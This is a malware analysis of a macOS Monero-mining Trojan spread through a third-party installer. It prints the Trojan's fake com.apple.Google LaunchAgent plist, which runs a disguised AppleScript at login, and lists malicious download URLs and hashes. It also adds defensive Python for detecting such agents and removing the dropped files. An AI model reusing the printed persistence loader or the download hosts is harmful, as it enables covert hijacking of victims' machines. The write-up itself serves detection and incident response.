The Mac next door: a brief analysis of a coin-mining Trojan

Source: Internet
Author: User

Background

During a recent incident response we found a Mac infected with a coin-mining Trojan whose purpose is to mine Monero (XMR). On following up with the victim we learned that the user had installed a third-party DMG downloaded from a Mac software site. It has been confirmed that a third-party "Install LOL" Mac app (Install-LOL.app, listed in the IOCs below) drops this Trojan, and we suspect that many third-party DMGs circulating on the Internet carry related malware.

Symptoms

According to user reports, infected machines generally show the following symptoms:

    • High CPU usage
    • System lag and freezes
    • Activity Monitor will not open
    • The machine overheats
Infection

A brief analysis suggests the Trojan originates in the third-party installation package. While the package is being unpacked and installed, it drops a malicious file disguised as an image, 11.png (the name can vary), together with two LaunchAgent files, com.apple.Yahoo.plist and com.apple.Google.plist, in ~/Library/LaunchAgents/.

    • com.apple.Google.plist is the launchd startup item. Its only job is to run com.apple.Yahoo.plist through osascript, so despite its extension that second file is an AppleScript, not a property list. RunAtLoad makes the agent run at every login, StartInterval re-runs it every 31104000 seconds (360 days), and the com.apple.* label is an impersonation: Apple ships its own agents in /System/Library/LaunchAgents, never in ~/Library/LaunchAgents.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.apple.Google</string>
    <key>Program</key>
    <string>/usr/bin/osascript</string>
    <key>ProgramArguments</key>
    <array>
        <string>osascript</string>
        <string>-e</string>
        <string>do shell script "osascript ~/Library/LaunchAgents/com.apple.Yahoo.plist"</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>31104000</integer>
    <key>WatchPaths</key>
    <array/>
</dict>
</plist>
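A heuristic check for this kind of persistence, as an added example that is not part of the original write-up. It parses a LaunchAgent plist with Python's standard plistlib and flags the traits visible in com.apple.Google.plist above: an Apple-style label in a per-user agent, a script interpreter as the program, script text passed inline with -e, AppleScript's "do shell script", and osascript being pointed at a file with a .plist name. The sample plist is the one quoted above and KNOWN_BAD_LABELS holds the two labels the article names; the interpreter list, the benign contrast plist and the scan_launch_agents helper are assumptions of this example, not the article's tooling.

```python
"""Heuristic triage of per-user LaunchAgents.

Added example, not code from the original write-up. The checks below are
this editor's reading of the com.apple.Google.plist quoted in the article;
the sample plist is the article's, KNOWN_BAD_LABELS are the two labels it
names, and everything else here is an assumption of this example."""
import plistlib
import re
from pathlib import Path

# Interpreters that a legitimate LaunchAgent rarely needs to invoke with
# inline script text; each is a reason to look closer, not proof by itself.
SCRIPT_INTERPRETERS = {"osascript", "sh", "bash", "zsh", "python", "python3", "perl"}

# Labels named in the article.
KNOWN_BAD_LABELS = {"com.apple.Google", "com.apple.Yahoo"}

# The persistence plist quoted in the article.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key><string>com.apple.Google</string>
    <key>Program</key><string>/usr/bin/osascript</string>
    <key>ProgramArguments</key>
    <array>
        <string>osascript</string>
        <string>-e</string>
        <string>do shell script "osascript ~/Library/LaunchAgents/com.apple.Yahoo.plist"</string>
    </array>
    <key>RunAtLoad</key><true/>
    <key>StartInterval</key><integer>31104000</integer>
    <key>WatchPaths</key><array/>
</dict>
</plist>
"""

# A benign agent, constructed here for contrast.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.backup</string>
    <key>ProgramArguments</key>
    <array><string>/usr/local/bin/backup</string><string>--daily</string></array>
    <key>StartCalendarInterval</key><dict><key>Hour</key><integer>2</integer></dict>
</dict>
</plist>
"""


def triage_launch_agent(data: bytes, per_user: bool = True) -> list[str]:
    """Return the reasons an agent plist looks suspicious (empty list = clean)."""
    plist = plistlib.loads(data)
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    # launchd uses Program as the executable when present, else argv[0].
    program = str(plist.get("Program") or (args[0] if args else ""))
    exe = Path(program).name
    joined = " ".join(args)
    reasons = []

    # Apple ships its own agents in /System/Library/LaunchAgents, never in
    # ~/Library/LaunchAgents, so a com.apple.* label there is impersonation.
    if per_user and label.startswith("com.apple."):
        reasons.append(f"Apple-style label in a per-user agent: {label}")
    if label in KNOWN_BAD_LABELS:
        reasons.append(f"label matches this campaign: {label}")
    if exe in SCRIPT_INTERPRETERS:
        reasons.append(f"agent is a script interpreter: {program}")
    if "-e" in args and exe in SCRIPT_INTERPRETERS:
        reasons.append("script text passed inline with -e")
    if "do shell script" in joined:
        reasons.append("AppleScript 'do shell script' (shell through osascript)")
    # The article's trick: an AppleScript stored under a .plist name and fed to osascript.
    if re.search(r"osascript\s+\S+\.plist", joined):
        reasons.append("osascript executing a '.plist' file (script disguised as a plist)")
    if re.search(r"~/Library/(LaunchAgents|Safari)/", joined):
        reasons.append("arguments reference a payload under ~/Library")
    return reasons


def scan_launch_agents(directory: Path) -> dict[str, list[str]]:
    """Triage every *.plist in `directory`; returns {filename: reasons} for hits only."""
    hits = {}
    for p in sorted(directory.glob("*.plist")):
        try:
            reasons = triage_launch_agent(p.read_bytes())
        except Exception as exc:
            # com.apple.Yahoo.plist in this incident is AppleScript, not XML:
            # an unparseable "plist" in LaunchAgents is itself worth a look.
            reasons = [f"unparseable plist: {exc}"]
        if reasons:
            hits[p.name] = reasons
    return hits


if __name__ == "__main__":
    for reason in triage_launch_agent(SAMPLE_PLIST):
        print("-", reason)
    print(scan_launch_agents(Path.home() / "Library" / "LaunchAgents"))
```

Run on a Mac, the final line sweeps the current user's LaunchAgents; each hit is a list of reasons rather than a verdict, because a single trait (an interpreter as the program, for instance) also occurs in legitimate agents.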

Execution

We also found another PNG file and confirmed that running it has the same effect as 11.png: both are AppleScript files belonging to this Trojan, disguised with an image extension.
When the script runs, it connects to ondayon.com:8080 and downloads the following malicious files.

Path: ~/Library/Safari/

    • ssl.plist (the mining program)
    • pools.txt
    • cpu.txt
    • config.txt

Listing (link count, owner, group, size, date, name):

    1 xxxxxx  staff   788212  8 17 16:08 ssl.plist
    1 xxxxxx  staff      343  8 17 16:08 config.txt
    1 xxxxxx  staff      229  8 17 16:08 pools.txt
    1 xxxxxx  staff      256  8 17 16:08 cpu.txt

And in ~/Library/Safari/openssl/lib/, presumably the OpenSSL libraries the miner links against:

    • libcrypto.1.0.0.dylib
    • libssl.1.0.0.dylib

Listing (link count, owner, group, size, date, name):

    4 xxxxxx  staff      128  5 30 16:51 .
    3 xxxxxx  staff       96  5 30 16:51 ..
    1 xxxxxx  staff   385152  9 29  2017 libssl.1.0.0.dylib
    1 xxxxxx  staff  1767648  9 29  2017 libcrypto.1.0.0.dylib
Mining

ssl.plist is a compiled Monero (XMR) mining program; its only function is to mine. The names of the files dropped alongside it (pools.txt, cpu.txt, config.txt) suggest they hold its pool, CPU and general configuration.

Emergency repair
    • Unload the two LaunchAgents (launchctl), kill the mining process, and then delete all of the files listed above; deleting the plists alone does not stop a job that launchd has already loaded.
    • Locate the third-party DMG or other third-party installer you downloaded and installed; if it is the one that caused the problem, delete it.

Related IOCs

IP addresses
43.294.204.183 (as printed; the second octet is out of range, so this address is garbled)
45.195.146.32
101.55.20.149

Domain
ondayon.com

URLs
http://ondayon.com:8080/ssl.zip
http://101.55.20.149/ssl.zip
http://101.55.20.149/gogoto.png
http://101.55.20.149/8/Build.zip

Hashes (SHA-256)
0659b79c1b1274dc1e708cae010c9a2e778a3a52a476262015a788082b22a697  libcrypto.1.0.0.dylib
fde413f8f369c2ede2f0f82e0ab7fe35eb6d4c770d73a6a58ad52fd9ddd65804  ssl.plist
c60e197f216fe29f1a9d0b80d0381fcebefe04b6f4d68db3255b6a002f0018c3  libssl.1.0.0.dylib
f89205a8091584e1215cf33854ad764939008004a688b7e530b085e3230effce  ondayon.png
5619d101a7e554c4771935eb5d992b1a686d4f80a2740e8a8bb05b03a0d6dc2b  Install-LOL.app.zip
2b566d454faabb38cd5b173f9365b89bda5e88d4bfaa7dea97512cc9d89e9150  Build.zip
6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d  x.x
ab4596d3f8347d447051eb4e4075e04c37ce161514b4ce3fae91010aac7ae97f  com.apple.Yahoo.plist
2eb531d2d00c783fb83da9e925177a6aa3f567dec7f678cbe6c30f9dfd5111e7  com.apple.Google.plist
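A host sweep that ties the drop paths from the infection and mining sections to the hashes above and plans the clean-up the emergency-repair section recommends, as an added example that is not the article's own tooling. DROP_PATHS and IOC_SHA256 are taken from the article; the directory fixture built by demo() is constructed here so the sweep runs offline, and its files deliberately do not match the real hashes. The pkill pattern assumes the miner runs from its drop path, and apply_plan only invokes tools that exist on the host.

```python
"""Sweep a home directory for the artefacts this write-up describes and
plan the clean-up it recommends.

Added example, not the article's own tooling. DROP_PATHS and IOC_SHA256
come from the article; the fixture in demo() is constructed here and its
stand-in files do not match the real hashes. The pkill pattern assumes
the miner runs from its drop path (an assumption, not stated by the
article), and apply_plan skips any tool missing from the host."""
import hashlib
import shutil
import subprocess
import tempfile
from pathlib import Path

# SHA-256 of the dropped files, keyed by on-disk file name (from the IOC list).
IOC_SHA256 = {
    "ssl.plist": "fde413f8f369c2ede2f0f82e0ab7fe35eb6d4c770d73a6a58ad52fd9ddd65804",
    "libssl.1.0.0.dylib": "c60e197f216fe29f1a9d0b80d0381fcebefe04b6f4d68db3255b6a002f0018c3",
    "libcrypto.1.0.0.dylib": "0659b79c1b1274dc1e708cae010c9a2e778a3a52a476262015a788082b22a697",
    "com.apple.Yahoo.plist": "ab4596d3f8347d447051eb4e4075e04c37ce161514b4ce3fae91010aac7ae97f",
    "com.apple.Google.plist": "2eb531d2d00c783fb83da9e925177a6aa3f567dec7f678cbe6c30f9dfd5111e7",
}

# Where the article saw the files, relative to the victim's home directory.
DROP_PATHS = [
    "Library/LaunchAgents/com.apple.Google.plist",
    "Library/LaunchAgents/com.apple.Yahoo.plist",
    "Library/Safari/ssl.plist",
    "Library/Safari/pools.txt",
    "Library/Safari/cpu.txt",
    "Library/Safari/config.txt",
    "Library/Safari/openssl/lib/libssl.1.0.0.dylib",
    "Library/Safari/openssl/lib/libcrypto.1.0.0.dylib",
]


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(home: Path) -> list[dict]:
    """One finding per dropped path present under `home`. `hash_match` is
    True/False against the IOC list, or None when the list has no hash for
    that name (pools.txt, cpu.txt, config.txt). A present file with a
    non-matching hash is still a hit: the config files vary per victim and
    a repacked miner would too."""
    findings = []
    for rel in DROP_PATHS:
        p = home / rel
        if not p.is_file():
            continue
        digest = sha256_file(p)
        known = IOC_SHA256.get(p.name)
        findings.append({"path": p, "sha256": digest,
                         "hash_match": None if known is None else digest == known})
    return findings


def plan_remediation(findings: list[dict]) -> list[list[str]]:
    """Order matters: stop the miner, unload the agents, then delete. Removing
    a loaded agent's plist does not stop the job launchd already registered."""
    plan = [["pkill", "-f", "Library/Safari/ssl.plist"]]  # assumes drop-path execution
    for f in findings:
        if f["path"].parent.name == "LaunchAgents":
            plan.append(["launchctl", "unload", str(f["path"])])
    for f in findings:
        plan.append(["rm", "-f", str(f["path"])])
    return plan


def apply_plan(plan: list[list[str]]) -> None:
    """Execute the plan; tools absent from this host (launchctl off macOS) are skipped."""
    for argv in plan:
        if shutil.which(argv[0]):
            subprocess.run(argv, check=False)


def demo() -> tuple[list[dict], list[list[str]]]:
    """Build a constructed infection under a temp dir, sweep it, plan clean-up."""
    home = Path(tempfile.mkdtemp())
    for rel in ("Library/Safari/ssl.plist", "Library/Safari/pools.txt",
                "Library/LaunchAgents/com.apple.Google.plist"):
        (home / rel).parent.mkdir(parents=True, exist_ok=True)
        (home / rel).write_bytes(b"constructed stand-in for " + rel.encode())
    findings = sweep(home)
    plan = plan_remediation(findings)
    shutil.rmtree(home)
    return findings, plan


if __name__ == "__main__":
    findings, plan = demo()
    for f in findings:
        print(f["path"].name, f["sha256"][:16], f["hash_match"])
    for argv in plan:
        print(" ".join(argv))
```

On a real machine, replace demo() with `sweep(Path.home())`, review the findings, and only then call `apply_plan(plan_remediation(findings))`; the split between planning and applying exists so the operator sees exactly which files and agents will be touched before anything is killed or deleted.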
